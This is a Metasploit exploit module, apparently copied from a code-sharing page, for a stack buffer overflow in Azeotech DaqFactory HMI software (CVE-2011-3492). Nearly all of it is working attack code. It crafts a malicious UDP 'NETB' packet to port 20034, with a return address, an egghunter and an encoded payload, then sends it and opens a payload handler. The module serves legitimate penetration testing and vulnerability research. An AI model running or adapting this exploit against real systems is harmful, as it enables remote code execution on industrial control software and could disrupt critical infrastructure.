Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10
  include Msf::Exploit::Remote::Egghunter
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'DaqFactory HMI NETB Request Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in Azeotech's DaqFactory
17
        product. The specific vulnerability is triggered when sending a specially crafted
18
        'NETB' request to port 20034. Exploitation of this vulnerability may take a few
19
        seconds due to the use of egghunter.  This vulnerability was one of the 14
20
        releases discovered by researcher Luigi Auriemma.
21
      },
22
      'Author'         =>
23
        [
24
          'Luigi Auriemma',  # Initial discovery, crash poc
25
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
26
        ],
27
      'References'     =>
28
        [
29
          [ 'CVE', '2011-3492'],
30
          [ 'OSVDB', '75496'],
31
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
32
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01']
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'process',
37
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
38
        },
39
      'Payload'        =>
40
        {
41
          'Space'    => 600,
42
          'BadChars' => "\x00",
43
        },
44
      'Platform'       => 'win',
45
      'Targets'        =>
46
        [
47
          [
48
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
49
            {
50
              'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
51
              'Offset' => 636,
52
            }
53
          ],
54
        ],
55
      'DisclosureDate' => '2011-09-13',
56
      'DefaultTarget'  => 0))
57

58
    register_options(
59
      [
60
        # Required for EIP offset
61
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
62
        Opt::RPORT(20034)
63
      ])
64
  end
65

66
  def exploit
67
    connect_udp
68

69
    print_status("Trying target #{target.name}...")
70

71
    eggoptions ={
72
      :checksum => false,
73
      :eggtag => 'scar',
74
    }
75

76
    # Correct the offset according to the 2nd IP (DHCP) length
77
    iplen = datastore['DHCP'].length
78
    offset = 93-iplen
79

80
    if offset >= 80
81
      pktoffset = offset - 80
82
      finaloffset = target['Offset']-pktoffset
83
    elsif offset <= 79
84
      pktoffset = 80 - offset
85
      finaloffset = target['Offset']+pktoffset
86
    end
87

88
    # springboard onto our unmodified payload
89
    p = Rex::Arch::X86.jmp(750) + payload.encoded
90
    hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)
91

92
    sploit  = "NETB"  # NETB request overflow
93
    sploit << rand_text_alpha_upper(233)
94
    sploit << "\x00"  # part of the packet structure
95
    sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
96
    sploit << make_nops(2)
97
    sploit << hunter
98
    sploit << rand_text_alpha_upper(52-hunter.length-2)
99
    sploit << [target.ret].pack("V")
100
    sploit << rand_text_alpha_upper(12)
101
    sploit << Rex::Arch::X86.jmp_short(-70)
102
    sploit << egg
103
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
104
    sploit << rand_text_alpha_upper(finaloffset-egg.length)
105

106
    # The use of rand_text_alpha_upper() ensures we always get the same length for the
107
    # first IP address.
108
    sploit[12,4] = rand_text_alpha_upper(4)
109

110
    udp_sock.put(sploit)
111

112
    handler
113
    disconnect_udp
114
  end
115
end
116

117